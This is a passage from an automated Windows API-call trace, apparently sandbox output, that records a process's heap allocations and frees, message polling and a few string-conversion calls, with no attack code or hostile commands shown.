(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0245.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0245.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0245.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0245.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0245.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0245.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0245.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0245.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0245.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0245.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0245.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0245.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0245.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0245.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0245.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0245.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0245.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0245.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0245.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0245.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0245.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0245.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0245.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0245.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0245.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0245.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0245.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0245.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0245.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0245.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0245.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0245.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0245.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0245.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0245.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0245.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0245.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0245.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0245.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0245.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0245.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0245.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0245.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0245.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0245.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0245.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0245.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0245.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0245.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0245.701] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0245.701] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0245.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0245.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0245.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0245.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0245.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0245.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0245.701] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0245.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0245.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0245.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0245.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0245.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0245.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0245.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0245.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e18 [0245.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0245.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0245.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0245.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0245.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0245.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0245.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0245.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0245.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0245.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0245.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0245.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0245.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0245.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.703] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0245.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0245.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0245.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0245.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0245.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0245.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0245.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0245.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0245.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0245.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0245.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0245.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0245.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d38 [0245.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0245.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0245.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0245.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0245.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0245.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0245.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0245.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0245.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0245.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0245.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0245.740] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0245.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0245.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0245.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0245.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0245.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0245.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0245.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54db8 [0245.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0245.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0245.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0245.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54dd8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0245.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0245.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0245.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d18 [0245.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0245.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0245.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0245.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0245.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0245.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0245.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.741] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0245.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0245.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0245.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0245.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56028 [0245.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0245.741] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56028 | out: hHeap=0x970000) returned 1 [0245.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0245.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0245.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0245.741] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0245.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 